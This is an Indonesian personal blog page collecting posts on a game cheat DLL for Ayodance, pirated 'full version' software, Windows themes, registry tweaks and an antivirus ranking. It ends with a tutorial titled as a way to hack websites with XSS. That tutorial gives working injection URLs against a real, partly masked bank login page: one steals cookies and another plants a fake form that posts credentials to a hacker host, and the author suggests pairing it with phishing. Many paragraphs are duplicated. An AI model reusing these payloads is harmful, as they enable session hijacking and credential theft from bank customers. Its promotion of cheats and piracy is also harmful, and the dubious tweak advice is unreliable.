Welcome To My BLOG
INVITE ME WHATSAPP 0852 0707 7076 WECHAT SHIIXIAN FOLLOW TWITTER @SHIXIANZ THANKS
Android
Android
INFINITE CAN YOU SMILE
└ºνє♡ u. (˘⌣˘)
Welcome To My Blog
Hello Guys Welcome to my blog

Kamis, 05 September 2013
Selasa, 03 September 2013
Cheat Ayodance 6097

Berikut adalah Tutorial Pemakaian Cheat ini :
- Download Terlebih Dahulu Cheatnya
- EXTRACT Files Ke Desktop Terlebih Dahulu
- Copy d3d9.dll ( CTRL + C )
- Klik Kanan Ayodance Kalian
- Pilih Properties
- Pilih Find Target - Paste ( CTRL + V )
- Login Ayodance
- Tekan Hotkeys Di Dalam Game Untuk Aktifkan Cheatnya
Features n Hotkeys :
- Perfect All Mode ON : F3
- Perfect All Mode OFF : F4 - Auto Key ON : F5
- Auto Key OFF : F6
- Skip PIN 2nd : Auto ON

Rabu, 14 Agustus 2013
Connectify Hotspot Pro 7 Full Version
Download Connectify Hotspot Pro 6 Full Version
Connectify Hotspot Pro 6 Full Version - Adalah aplikasi untuk membuat komputer sobat menjadi wi-fi agar bisa berbagi koneksi internet sobat dengan teman, baik itu pengguna komputer, android, ataupun mobile perangkat yang mendukung wireless lainya. Connectify Hotspot Pro 6 Full Version ini sangatlah sobat butuhkan di install di komputer sobat juka ingin berbagi koneksi internet dengan perangkat lain.
Connectify Hotspot: For Hotspot users this is a major new release, bringing a new driver, and many performance improvements:
- New Driver: A new driver is installed which provides increased stability and works better with Windows 8.
- New Tutorial: The new tutorial walks you through setting up your Hotspot for the first time. The tutorial walkthrough can be launched anytime from the Connectify Help menu.
- New Online Profile: Hotspot PRO users now have access to their web-based Connectify account profile. The profile lets users manage their Connectify product licenses and login information, easily submit and track support tickets, and provides one click access to tutorials and FAQ.
- Bug Fixes: Too many to list. This release represents nearly 6 months of effort to improve performance and solve customer issues. The work on Connectify Dispatch lead to a major overhaul of the underlying networking engine of Hotspot. Users will see more reliable, faster Internet, that works with more broadband cards and carrier networks worldwide.
- Update: Connectify 5 runs on Windows 7 and Windows 8. Users running XP and Vista can continue to use Connectify Hotspot 7
- Update: Connectify uses the .NET 7 Framework. The installer will prompt Windows 7 users to install .NET 7 if it is not already installed.
- Feature: The Connectify Troubleshooter now allows the user to specify whether they are trying to troubleshoot Hotspot or Dispatch.
- Feature: Support tickets are now accessible from one easy location on the Connectify site. You can find them either from the menu under Help -> Online Support,
- Feature: Hotspot will automatically choose the recommended “Internet to Share” device if the user has not previously selected a device to use.
- Feature: Wireless devices in the “Internet to Share” list display the wireless SSID in addition to the adapter name .

Silakan mau pilih yang mana Anda Silakan Memilih!!
Rabu, 24 Juli 2013
Rabu, 03 Juli 2013
Senin, 17 Juni 2013
Theme Sir Blue Seven
Selamat datang di haramain software, gudang tempat download software, theme, game, yang keren. di hari senin ini saya akan bagikan theme windows 7 yang keren lagi untuk para sahabat haramain software. Seperti bioasanya haramain software akan bagikan theme untuk windows 7 yang keren untuk sahabat.
Kalau sebelumnya haramain software pernah berbagi theme Sir Red Se7en Visual Style For windows 7, sekarang saya juga akan bagikan saudaranya yaitu Sir Blue Se7en Visual Style for windows 7. Theme yang satu ini juga tidak kalah kerennya dengan theme-theme sebelumnya.
Haramain software juga sedang mencari theme yang sedang di request sama sahabat haramain softwarte. Untuk sahabat haramain software yang request theme windows 7, ditunggu saya akan saya coba carikan theme yang sesuai dengan keinginan sahabat haramain software. Theme ini juga lebih ringan dibandingkan theme saudaranya yang theme sir red se7ene visual style for windows 7.
Screenshot :
Tema Tron Legacy Windows 7
Tema Tron Legacy Windows 7
Kembali lagi haramain software berbagi theme untuk semua sahabat. Theme kali ini adalah theme koleksi haramain software yang bisa dibilang super keren .
Theme windows 7 yang super keren ini namanya adalah theme tron legacy. Theme tron legacy ini nanti setelah di install dan membuka personalizenya terbagi menjadi 4 theme yang bisa digunakan yang mana saja sesuai selera.
Di dalam file theme yang saya bagikan ini juga sudah saya sertakan dengan screensavers , Icon pack dan black glassnya yang berfungsi untuk membuat windows menjadi transparant.
Screen Shoot :
Kalau gambar diatas kurang jelas, klik kanan pada gambar kemudian open link in new tab ( buka di tab baru ) untuk melihat ukuran gambar yang lebih besar.
Cara install :
- Install terlebih dahulu universal theme patcher jika di PC sobat belum terinstall universal theme patcher kemudian restart. jika sahabat HS belum punya universal theme patcher, silahkan download di sini.
- Setelah install universal, extrak file yang di download dan jalankan Tron Legacy.exe untuk menginstall themenya ( klik kanan di desktop, pilih personalize, dan pilih salah satu dari 4 theme hasil install thee Tron legacy ).
- Bagi yang ingin menginstall icon packnya, caranya silahkan baca Disini
- Untuk cara penggunaan black glass enhanced untuk membuat windows trasparant, didalamnya sudah saya sertakan cara menggunakannya.
- SELESAI
Sabtu, 15 Juni 2013
Cara Membuat Tampilan Desktop Menjadi 3D
Cara Membuat Tampilan Desktop Menjadi 3D
Software Real Desktop 2.02 akan membuat desktop tiga-dimensi yang nyata. Perangkat lunak ini menggunakan sumber daya sistem yang sangat sedikit, fitur seperti kemungkinan memilih pada setiap ikon lain, ikon transparan, mengubah ikon dan puts agan inginkan. Juga, ikon pada desktop adalah modus refleksi. software ini akan membuat desktop agan² menjadi lebih menyenangkan dengan fitur 3D dari berbagai fitur yang diberikan.
Software Desktop Fitur yang nyata:
- Dukungan untuk beberapa monitor
- Sembunyikan dan menampilkan nama file
- Menempatkan gambar berbeda pada dinding
- Pengaturan brightness lanjutan
- Berputar ikon dalam arah yang berbeda dan itu kembali normal
- Resize ikon
- Transfer langsung dari file dan folder
- Buat cadangan dari posisi ikon desktop
- Menambahkan grafis rencana
- Menempatkan latar belakang desktop desktop yang 3-D ruang pada dinding
- Kemampuan untuk menyesuaikan backlight dan mode optik, seperti tanggal, objek, waktu
- Dukungan untuk beberapa bahasa di dunia, termasuk bahasa Persia manis
- Berbagai jenis cahaya dan radiasi
- Kemampuan untuk melihat gambar dengan permukaan reflektif
- Suara 3D
- Dukungan Drag & Drop fungsi
- Dengan berbagai tema dan gaya, dan gaya yang berbeda
- Ikon Sampah memiliki beberapa menarik dan menyenangkan
Software Desktop Fitur yang nyata:
- Dukungan untuk beberapa monitor
- Sembunyikan dan menampilkan nama file
- Menempatkan gambar berbeda pada dinding
- Pengaturan brightness lanjutan
- Berputar ikon dalam arah yang berbeda dan itu kembali normal
- Resize ikon
- Transfer langsung dari file dan folder
- Buat cadangan dari posisi ikon desktop
- Menambahkan grafis rencana
- Menempatkan latar belakang desktop desktop yang 3-D ruang pada dinding
- Kemampuan untuk menyesuaikan backlight dan mode optik, seperti tanggal, objek, waktu
- Dukungan untuk beberapa bahasa di dunia, termasuk bahasa Persia manis
- Berbagai jenis cahaya dan radiasi
- Kemampuan untuk melihat gambar dengan permukaan reflektif
- Suara 3D
- Dukungan Drag & Drop fungsi
- Dengan berbagai tema dan gaya, dan gaya yang berbeda
- Ikon Sampah memiliki beberapa menarik dan menyenangkan
Jumat, 14 Juni 2013
Tips Mempercepat Kerja Komputer
Tips Mempercepat Kerja Komputer
1. Mencegah Aplikasi Kehilangan Focus Perintah
Tips dan Trick kali ini sangat cocok bagi Anda yang bekerja super cepat dengan kompi / lepi Anda. Trick ini mencegah hilangnya fokus pada aplikasi saat Anda memberikan perintah yang cepat. Terkadang bila kita terlalu cepat memberikan perintah terhadap kompi / lepi kita, bisa jadi aplikasi yang sedang kita pakai mengalami hang atau not responding. Untuk mencegah terjadinya ini silakan ikuti langkah dibawah ini:
Tips dan Trick kali ini sangat cocok bagi Anda yang bekerja super cepat dengan kompi / lepi Anda. Trick ini mencegah hilangnya fokus pada aplikasi saat Anda memberikan perintah yang cepat. Terkadang bila kita terlalu cepat memberikan perintah terhadap kompi / lepi kita, bisa jadi aplikasi yang sedang kita pakai mengalami hang atau not responding. Untuk mencegah terjadinya ini silakan ikuti langkah dibawah ini:
- Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
- Setelah registry muncul, masuk ke alamat berikut ini:HKEY_CURRENT_USER > Control Panel > Destop.
- Ubah nilai value ForegroundLockTimeout menjadi 00030d40.
- Restart kompi / lepi Anda.
- Pengaturan selesai.
2. Mengoptimalkan Hardisk Saat Komputer Dalam Keadaan Idle
Keadaan idle adalah keadaan dimana komputer sedang dalam posisi hidup tapi tidak digunakan. Agar hardisk otomatis dapat bekerja dengan optimal kembali saat kita menggunakannnya lagi dari posisi idle, ikuti langkah berikut ini :
- Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
- Setelah registry muncul, masuk ke alamat berikut ini:HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows >CurrentVersion > OptimalLayout.
- Buat DWORD value baru dan beri nama EnableAutoLayout.
- Set value menjadi 1.
- Restart kompi / lepi Anda.Pengaturan selesai.
3. Tweaking Memory pada Windows
Kita dapat meningkatkan kinerja Windows dengan memanfaatkan memori. Apabila DisablePagingExecutive diaktifkan, Windows tidak akan melakukan pagisng file ke dalam hardisk. Sistem operasi dan program - program menjadi lebih responsif. Jika LargeSystemCache diaktifkan, sistem akan mengalokasikan seluruh memori (kecuali 4 MB untuk disk caching) untuk file caching. Komputer akan melakukan caching kernel di dalam memory sehingga Windows dapat berjalan lebih cepat.
- Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
- Setelah registry muncul, masuk ke alamat berikut ini:HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > Session Management > Memory Management.
- Ubah value DisanlePagingExecutive menjadi 1.
- Ubah value LargeSystemCache menjadi 1.
- Restart kompi / lepi Anda.
- Pengaturan selesai.
4. Menambah L2 Cache Sesuai Dengan Cache Memory Yang Terinstall
Jika kita sering mengunjungi sebuah website tertentu secara berulang - ulang, lebih baik kita memiliki memory cache yang lebih besar yang digunakan untuk menyimpan data dari website yang telah kita kunjungi. Langkah ini cukup efektif dalam menghemat bandwith agar tidak terbuang percuma. Mari ikuti langkah dibawah ini :
- Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
- Setelah registry muncul, masuk ke alamat berikut ini:HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > Session Manager > Memory Management.
- Ubah nilai value SecondLevelDataCache menjadi 1024. <[Decimal]
- Restart kompi / lepi Anda.
- Pengaturan selesai.
5. Membuat Desktop Lebih Stabil
Cara untuk membuat desktop kompi / lepi kita menjadi lebih stabil. Berikut langkah - langkahnya:
- Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
- Setelah registry muncul, masuk ke alamat berikut ini:HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > Explorer.
- Buat DWORD value baru dan beri nama DesktopProcess.
- Set value menjadi 1.
- Restart kompi / lepi Anda.
- Pengaturan selesai.
Antivirus terbaik 2013
Antivirus terbaik 2013- virus memang selalu menjadi ancaman
serius bagi setiap komputer dan seolah-olah kita hidup di dunia digital
yang semakin gelap dan berbahaya yang dipenuhi dengan kejahatan. Apalagi
setiap tahun selalu bermunculan virus-virus baru yang semakin canggih
saja dan menyebar luas yang dapat mengancam keamanan komputer kita.
Banyak virus berkeliaran di dunia maya seperti malware, trojan, worm,
spamware dan masih banyak lagi yang sewaktu-waktu dapat masuk dan
merusak komputer kita saat menjelajah di internet.
Tetapi untungnya selalu ada pahlawan pemberani yang selalu membantu
untuk melindungi kita dari berbagai ancaman tersebut, mereka adalah para
perusahaan keamanan komputer (security computer) yang selalu aktif
bekerja dan berusaha untuk melindungi setiap komputer di dunia.
Ada banyak perusahaan antivirus yang selalu menciptakan produk
berkualitas guna menciptakan keamanan mutu tinggi bagi komputer. Namun
dari hasil survey yang dilakukan para peneliti menghasilkan bahwa hanya
ada beberapa antivirus yang terpilih menjadi yang terbaik di tahun 2013
ini. Sebut saja perusahaan-perusahaan besar seperti Kapersky,
Bitdefender, AVG, Norton dan Trend Micro. Mereka telah berhasil
menciptakan produk antivirus terbaiknya dan mengalahkan
antivirus-antivirus lain di tahun 2013 ini.
Kelima antivirus ini dikategorikan sebagai yang terbaik karena telah
dinilai dari kualitas dan performanya dalam melindungi komputer. Dan
saya akan mengurutkan dari yang terbaik dari kelima antivirus tersebut
yang saya tampilkan sebagai berikut.
Daftar 5 Antivirus Terbaik 2013 di Dunia
1. BitDefender Antivirus Plus 2013

Dari tahun ke tahun Bitdefender memang selalu menjadi yang terbaik
diantara yang terbaik. Di tahun ini Bitdefender mengeluarkan banyak
jenis antivirus, dan salah satu produk andalannya yaitu BitDefender
Antivirus Plus 2013 berhasil menempati urutan pertama sebagai antivirus
terbaik di tahun 2013 ini. Antivirus ini mencapai nilai yang sangat baik
dari hasil tes yang dilakukan badan peneliti antivirus ICSA Labs
(Laboratorium International Computer Security Association) dan West
Coast Labs.
BitDefender Antivirus Plus 2013 ini memang mempunyai kelebihan di atas
antivirus yang lain, dia dapat memberikan perlindungan ampuh dari
berbagai ancaman seperti virus, malware, spyware, dan pencurian
identitas yang bisa terjadi pada komputer kita. Bitdefender juga
memberikan perlindungan penuh kepada kita ketika sedang browsing di
internet dan kita bisa tetap aman dalam bertransaksi online. Ketika
melakukan pengecekan pada sistem komputer, BitDefender Antivirus Plus
2013 akan membutuhkan waktu yang lebih lama dari rata-rata antivirus
pada umumnya, itu karena Bitdefender sangat teliti dalam menyaring
sistem.
Download BUY
2. AVG Antivirus 2013

AVG menempati urutan kedua sebagai antivirus terbaik. AVG memang sudah
sangat terkenal di dunia antivirus, selalu menawarkan perlindungan yang
luar biasa dalam menghentikan berbagai serangan virus bahkan sebelum
anda menyentuh komputer anda. Selain itu AVG juga memeriksa data file
anda, link dan email sebelum anda membukanya, juga mencegah segala
sesuatu yang dapat memata-matai dan pencurian data pribadi anda.
AVG dikenal memiliki antivirus gratisan yang sangat baik, dan hampir
sebaik produk komersial lainya. Jadi jika kita mengharapkan produk
komersial yang lebih baik, AVG menawarakan produk komersialnya sendiri
yaitu AVG Antivirus 2013. AVG Antivirus 2013 ini juga menyediakan
perlindungan gratis untuk Handphone, Smartphone dan perangkat lainnya
seperti Tablet.
AVG Antivirus 2013 memiliki skor tinggi dari hasil tes yang dilakukan di
Lab. badan peneliti antivirus. AVG mempunyai filter terbaik dari setiap
antivirus yang ada tahun ini. Salah satunya firewall sederhana sebagai
perisai online yang berguna untuk mem-blok situs-situs berbahaya. Jadi,
AVG sudah melakukan pemindaian terhadap situs-situs tersebut sebelum
anda membukanya.
3. Kaspersky Antivirus 2013

Kaspersky telah mengeluarkan produk terbarunya tahun ini yaitu Kaspersky
Antivirus 2013 yang berhasil menempati urutan ke-tiga dari daftar TOP 5 Antivirus Terbaik 2013 di Dunia.
Kaspersky Antivirus 2013 memiliki fitur yang telah dilengkapi dan
diperbaharui yang tentunya lebih baik dari versi-versi sebelumnya.
Kaspersky juga memberikan pilihan update dari versi home sampai
coorporate tergantung dari kebutuhan anda. Selain itu, penggunaanya juga
sangat friendly dan cocok untuk pemula atau yang belum pernah
menggunakannya karena Kaspersky juga memberikan tutorial tentang
penggunaan antivirus ini.
Antivirus ini mampu mengenali dan mendeteksi virus-virus berbahaya yang
sulit dimusnahkan. Ketika kita sedang browsing di internet, kadang kita
tidak menyadari bahwa virus sudah masuk ke dalam sistem komputer kita
dan menginfeksi file-file dan data penting. Namun dengan Kaspersky hal
itu bisa diatasi dengan cepat. Security systemnya akan langsung
mendeteksi dan mengeksekusi kemudian menetralisir file tersebut untuk
dibersihkan. Kaspersky Antivirus 2013 ini memiliki kesensitivitas yang
cukup tinggi sehingga jika ia menemukan file atau perangkat lunak yang
tingkah lakunya mencurigakan maka Kaspersky akan langsung memberikan
tindakan berarti dalam menanganinya.
4. Trend Micro Titanium Antivirus Plus 2013

Pada urutan ke-empat ditempati oleh Trend Micro Titanium Antivirus Plus
2013. Antivirus juga memiliki tampilan yang user-friendly, cocok untuk
pengguna yang belum berpengalaman. Titanium Antivirus 2013 ini juga
mendapat nilai rata-rata yang cukup tinggi di laboratorium penelitian
antivirus.
Antivirus ini sangat baik dalam memblokir serangan malware yang melebihi
rata-rata antivirus lain yang dapat menghapus malware. Software ini
memiliki keakuratan yang tinggi namun lambat, dapat menyaring spam,
firewall serta fitur yang cukup keren dalam melindungi privasi facebook
anda.
5. Norton Antivirus 2013

Di urutan terakhir dari daftar TOP
5 Antivirus Terbaik 2013 di Dunia ditempati oleh Norton Antivirus 2013,
salah satu produk keluaran perusahaan kemanan komputer Symantec. Test
pengujian yang dilakukan di AV Test Labs di Jerman menunjukan hasil Norton Anti
Virus mampu mendisinfeksi computer yang sudah terinfeksi dan kemudahan dalam hal
penggunaan serta kemampuan menangkal serangan malware.
Antivirus Norton ini efektif untuk melindungi computer dari
berbagai serangan virus, worms, bots dan spyware. Selain itu juga Norton Anti Virus mudah
diinstal dan dioperasikan, proses scannya berjalan dengan cepat. Anda akan
mendapatkan support setiap hari dan setiap jam jika membeli produk ini. Norton AntiVirus mendeteksi malware yang
didasarkan pada perilaku file yang dicurigai. Melindungi Firefox dan Internet
Explorer dari malware yang mencoba untuk mengeksploitasi kerentanan browser.
Jika Anda menonton video atau bermain game pada komputer Anda, Norton secara
otomatis tidak menjalankan scan sistem. Dukungan pihak ketiga dari tes objektif
labs mengkonfirmasi bahwa Norton unggul mencegah serangan malware dan
mengeluarkan computer dari ancaman file yang sudah terinfeksi.
Selain melindungi PC terhadap spyware dan
virus, Norton AntiVirus juga memindai pesan instan dan email untuk memeriksa
lampiran yang terinfeksi, link yang mencurigakan dan virus. Juga memindai newsfeed Facebook Anda untuk menemukan
link ke situs-situs yang tidak aman atau berbahaya untuk download.
Itulah informasi mengenai TOP 5 Antivirus Terbaik 2013 di Dunia
yang semoga bisa bermanfaat untuk anda. Kelima antivirus diatas juga
sekaligus sebagai rekomendasi dari saya untuk anda dan anda boleh
memilih salah satu antivirus diantaranya untuk melindungi komputer dari
bebagai ancaman virus berbahaya yang dapat masuk dan merusak sistem
komputer anda. Dan perlu diketahui bahwa data dari kelima antivirus di
atas memang terpilih menjadi yang terbaik, diperoleh dari hasil tes yang
dilakukan oleh laboratorium independen milik badan-badan peneliti
antivirus di dunia.
Kita pasti sudah bosen tampilan monitor yang cuma iti-itu saja, tenang
ini adalah solusinya dengan memakai aplikasi rainmeter kita bisa membuat
tampilan monitor kita lebih hidup.
CARA MENGINSTAL :
1. Setelah di download ekstrak dulu, dengan mengeklik kanan file yang didownload lalu pilih ekstrak here.
2. setelah di ekstrak pilih file rain meter 3.2 yang berbentuk rar, lalu klik aplikasi rainmeter untuk memulai instal.
3.Pilih instalasi standar, dan klik lanjut untuk melanjutkan instalasi
4.Pilih lokasi kamu untuk menaruh file rainmeter, lalu klik instal
5.Setelah selesai tutup jangan lupa pilih jalankan rainmeter.
CARA AMPUH HACK WEBSITE DENGAN XSS
CARA AMPUH HACK WEBSITE DENGAN XSS
Jim Ley menemukan adanya permasalahan XSS pada
situs Google dan ia memutuskan untuk melaporkannya kepada Google. Lebih
dari dua tahun lamanya, ternyata laporan dari Jim Ley tidak digubris
sama sekali sehingga akhirnya pada bulan oktober 2004 ia memutuskan
untuk mempublikasikan kepada publik.
Kelemahan XSS yang terjadi pada situs Google ini memungkinkan dilakukannyaVirtual Defacement dimana halaman google akan diganti dengan halaman palsu yang dibuat oleh hacker.
Kelemahan XSS yang terjadi pada situs Google ini memungkinkan dilakukannyaVirtual Defacement dimana halaman google akan diganti dengan halaman palsu yang dibuat oleh hacker.
Jim Ley membuat halaman input informasi kartu kredit yang seakan-akan dilakukan oleh google, padahal bukan. Pada URL google, Jim Ley menambahkan kode :
L:javascript:javascript:document.appendChild(document.createElement('script')).src='http://jibbering.com/test.js
Kode ini akan membuat script yang berada pada situs lain yaitu jibbering.com/test.js akan dijalankan seakan-akan berasal dari google (http://jibbering.com/2004/10/google.html)
Tidak Hanya Google
Google bukanlah satu-satunya korban dari serangan XSS.
SunTrust Bank, Mastercard, National Westminster dan Wordplay adalah 'klien besar' yang terkekna serangan XSS dan Greenhalgh mempublikasikan tehnik yang digunakan dalam menginjeksi javascript terhadap situs bank yang seharusnya nomor satu dalam hal pengamanan. Kasus-kasus XSS masih terus berlangsung bahkan sampai detik ini dan OWASP ( Open Web Application Security Project ), sebuah organisasi yang mengusulkan diri pada keamanan aplikasi, mengkategorikan XSS sebagai permasalahan utama aplikasi web saat ini.
Situs Bank Lokal Menjadi Korban
Kejadian yang hampir serupa dengan yang dialami oleh Greenhalgh juga saya rasakan. Ceritanya pada saya hendak menggunakan transaksi internet banking (ya, saya adalah pengguna setia layanan ini) dan salah memasukan password. Aplikasi Internet banking menampilkan sebuah pesan/warning tentang kesalahan yang saya lakukan " User ID harus Alpha Numerik/User ID must be Alpha Numeric ".
Yang menarik perhatian saya adalah pesan yang ditampilkan ini, ternyata juga muncul di bagian URL! " https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=User ID harus Alpha Numerik/User ID must be Alpha Numeric ".
Suatu teknik yang biasa digunakan oleh
programmer untuk mengirimkan parameter kepada sebuah fungsi dan sebuah
teknik yang biasanya bermasalah dalam hal kelemahan injeksi script atau
kelemahan XSS!
Kejadian ini terjadi lebih dari 2 tahun yang lalu atau tepatnya pada bulan april 2007 dan telah saya laporkan kepada pihak bank melalui SMS ( 081811**** ) yang di jawab akan dilakukan investigasi.
Sampai tulisan ini saya buat kembali, ternyata permasalahan ini sama sekali tidak diperbaiki, mungkin karena dianggap bukan sebagai suatu kelemahan dan bukan sesuatu yang berbahaya.
Benarkah demikian? Saya akan memperlihatkan kepada Anda apa yang bisa saya lakukan akibat dari kesalahan semacam ini dan silahkan Anda nilai sendiri.
Teknik Mencari Kelemahan XSS
Untuk melihat kemungkinan serangan XSS, saya melihat source code yang dihasilkan pada saat warning aplikasi ini ditampilkan. Pada baris 230, terlihat kalimat yang ditampilkan berada didalam sebuah variable yaitu " err " dan variable ini berada didalam blok kode <script>.
Kejadian ini terjadi lebih dari 2 tahun yang lalu atau tepatnya pada bulan april 2007 dan telah saya laporkan kepada pihak bank melalui SMS ( 081811**** ) yang di jawab akan dilakukan investigasi.
Sampai tulisan ini saya buat kembali, ternyata permasalahan ini sama sekali tidak diperbaiki, mungkin karena dianggap bukan sebagai suatu kelemahan dan bukan sesuatu yang berbahaya.
Benarkah demikian? Saya akan memperlihatkan kepada Anda apa yang bisa saya lakukan akibat dari kesalahan semacam ini dan silahkan Anda nilai sendiri.
Teknik Mencari Kelemahan XSS
Untuk melihat kemungkinan serangan XSS, saya melihat source code yang dihasilkan pada saat warning aplikasi ini ditampilkan. Pada baris 230, terlihat kalimat yang ditampilkan berada didalam sebuah variable yaitu " err " dan variable ini berada didalam blok kode <script>.
- Untuk membuktikan adanya kelemahan XSS, saya mencoba memasukkan java
script standard yang akan menampilkan cookie dengan memodifikasi URL-nya
menjadi :
https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=';alert(document.cookie);</script>
Dengan merubah URL ini, kini bila dilihat melalui source code halaman yang menampilkan pesan akan berubah menjadi :
<script>
var err='';allert(document.cookie);</script>
alert(err);
iBankForm.action='login.jsp';
iBankForm.submit();
</script>
Harapan saya sebenarnya aksi ini akan gagal
karena mengharapkan adanya proteksi tambahan seperti pemblokiran
terhadap karakter khusus atau penghapusan kata<script> yang umum
dilakukan, ternyata dugaan saya keliru. Tidak ada proteksi sama sekali
terhadap potensi XSS ini dan aksi ini berhasil dengan baik yang
dibuktikan dengan menampilkan cookie yang berjalan dengan lancar.
Percobaan ini membuktikan bahwa pencurian cookie memungkinkan untuk terjadi sehingga memungkinkan adanya serangan session hijacking atau pengambil alihan suatu koneksi oleh hacker. Ada beberapa hal yang cukup menarik untuk diperhatikan dalam kasus ini.
Pertama, penggunaan https atau sebuah koneksi yang secure ternyata tidak berguna dalam kasus ini. Kedua, penggunaan sertifikat yang biasanya dikatakan sebagai jaminan keamanan ternyata juga tidak berguna bahkan bisa dikatakan menjebak. Saya akan menunjukan betapa tidak bergunanya sertifikat ini pada percobaan sederhana berikutnya.
Virtual Defacement
Selanjutnya, saya mencoba membuktikan serangan yang lebih serius yaitu dengan melakukan virtual defacement atau perubahan halaman secara virtual. Dikatakan sebagai virtual karena saya tidak benar-benar merubah tampilan halaman web bank tersebut namun hanya merubahnya secara virtual melalui injeksi perintah.
Kenapa berbahaya? Karena saya akan menambahkan sebuah input box baru yang seakan-akan disediakan oleh situs bank dan yang lebih berbahaya adalah ketika pengguna mengisi text box yang telah disediakan dan menekan tombol submit. Hasil inputan ini akan dikirimkan ke alamat hacker atau alamat yang telah saya tentukan, bukan ke alamat bank, padahal sertifikat situs tersebut masih asli lho !
Untuk menambahkan form text box dan tombol submit, saya tidak perlu menggunakan java script, cukup dengan tag HTML. URL yang telah dimodifikasi, akan terlihat sebagai berikut :
https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=';</script><form method="post" action="http//www.hacker.com/simpan.aspx"><p>User ID<input type="text" name"T1"><input type="Submit" value="Submit" name="B1></p></form><!--
Modifikasi URL akan membuat source code halaman login situs bank berubah menjadi :
<script> var err='';</script><form method="post" action="http//www.*******.com/a.aspx"><p>User ID<input type="text" name"T1"><input type="Submit" value="Submit" name="B1></p></form><!--' alert(err);iBankForm.action='login.jsp'; iBankForm.submit(); </script> </body> </html><script>
Percobaan ini membuktikan bahwa pencurian cookie memungkinkan untuk terjadi sehingga memungkinkan adanya serangan session hijacking atau pengambil alihan suatu koneksi oleh hacker. Ada beberapa hal yang cukup menarik untuk diperhatikan dalam kasus ini.
Pertama, penggunaan https atau sebuah koneksi yang secure ternyata tidak berguna dalam kasus ini. Kedua, penggunaan sertifikat yang biasanya dikatakan sebagai jaminan keamanan ternyata juga tidak berguna bahkan bisa dikatakan menjebak. Saya akan menunjukan betapa tidak bergunanya sertifikat ini pada percobaan sederhana berikutnya.
Virtual Defacement
Selanjutnya, saya mencoba membuktikan serangan yang lebih serius yaitu dengan melakukan virtual defacement atau perubahan halaman secara virtual. Dikatakan sebagai virtual karena saya tidak benar-benar merubah tampilan halaman web bank tersebut namun hanya merubahnya secara virtual melalui injeksi perintah.
Kenapa berbahaya? Karena saya akan menambahkan sebuah input box baru yang seakan-akan disediakan oleh situs bank dan yang lebih berbahaya adalah ketika pengguna mengisi text box yang telah disediakan dan menekan tombol submit. Hasil inputan ini akan dikirimkan ke alamat hacker atau alamat yang telah saya tentukan, bukan ke alamat bank, padahal sertifikat situs tersebut masih asli lho !
Untuk menambahkan form text box dan tombol submit, saya tidak perlu menggunakan java script, cukup dengan tag HTML. URL yang telah dimodifikasi, akan terlihat sebagai berikut :
https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=';</script><form method="post" action="http//www.hacker.com/simpan.aspx"><p>User ID<input type="text" name"T1"><input type="Submit" value="Submit" name="B1></p></form><!--
Modifikasi URL akan membuat source code halaman login situs bank berubah menjadi :
<script> var err='';</script><form method="post" action="http//www.*******.com/a.aspx"><p>User ID<input type="text" name"T1"><input type="Submit" value="Submit" name="B1></p></form><!--' alert(err);iBankForm.action='login.jsp'; iBankForm.submit(); </script> </body> </html><script>
Setelah memasukkan URL yang telah dimodifikasi, terlihat sebuah text box
berada di bawah halaman utama bank ! Apa artinya ini ? Virtual
Defacement telah berhasil dilakukan! Teknik mendeface tanpa merusak dan
merubah file yang ada didalam web server!
Kemungkinan Aksi Lanjutan
Saya sudah menunjukkan kepada Anda bagaimana mengambil cookie dengan java script dan bagaimana melakukan virtual defacement dengan menambahkan sebuah text box yang baru. Teknik Virtual Defacement ini cukup menarik karena bisa dilakukan walaupun situs menggunakan HTTPS dan ada yang lebih menarik lagi.
Biasanya, Anda selalu diwanti oleh pihak agar mengecek keabsahan sertifikat ( dalam contoh ini adalah cybertrust ) yang digunakan untuk memastikan keaslian situs yang digunakan. Pada kasus ini sertifikat yang Anda lihat adalah asli dan sah namun ketika Anda memasukkan data kedalam text box dan mengklik tombol submit, informasi Anda akan dikirimkan kepada hacker! Kaget ? Teknik ini bisa dikombinasikan dengan teknik penipuan/social engineering seperti dengan mengirimkan email kepada korban dan menginformasikan kepadanya tentang undian berhadiah atau memintanya mengganti password melalui form palsu yang telah disediakan oleh Hacker. Saya yakin, banyak sekali yang ahli dalam hal Social Engineering dan tidak perlu lagi saya berikan contoh-contoh lainnya. Kini, apakah menurut Anda serangan XSS berbahaya atau tidak? Siapa yang harus bertanggung jawab seandainya terjadi korban dalam kasus semacam ini?
Serangan XSS yang saya tunjukkan pada artikel ini, masih sangat sederhana dan tidak melakukan deface pada halaman secara total seperti yang pernah ditunjukkan olehJim Ley dan Greenhalgh namun bukan berarti tidak mungkin untuk dilakukan.
Dengan menginjeksi javascript, bahkan bisa dibuat fungsi keylogger, scanning network, pencurian password lokal dan lain sebagainya. Jadi, akibat dari permasalahan XSS ini jelas sangat serius bila di eksploitasi oleh orang yang tepat.
Sekedar info :
Saya sudah menunjukkan kepada Anda bagaimana mengambil cookie dengan java script dan bagaimana melakukan virtual defacement dengan menambahkan sebuah text box yang baru. Teknik Virtual Defacement ini cukup menarik karena bisa dilakukan walaupun situs menggunakan HTTPS dan ada yang lebih menarik lagi.
